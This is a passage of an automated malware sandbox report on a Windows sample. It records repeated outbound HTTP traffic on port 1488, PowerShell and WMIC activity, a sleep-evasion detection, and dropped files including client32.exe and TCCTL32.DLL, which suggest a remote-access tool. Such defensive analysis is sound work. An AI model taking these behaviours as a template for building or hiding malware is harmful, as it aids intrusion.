                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF76B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF748AF76B0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3431C06_2_6C3431C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: PyList_New,OpenSCManagerA,GetLastError,PyErr_SetFromWindowsErrWithFilename,EnumServicesStatusExW,GetLastError,free,malloc,EnumServicesStatusExW,PyUnicode_FromWideChar,PyUnicode_FromWideChar,Py_BuildValue,PyList_Append,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseServiceHandle,free,1_2_00007FFE103081E0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary,6_2_6C345E30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6240Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3537Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeWindow / User API: threadDelayed 525Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeWindow / User API: threadDelayed 9077Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\python3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\python311.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\pyexpat.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_elementtree.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\select.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_bz2.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_queue.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJump to dropped file
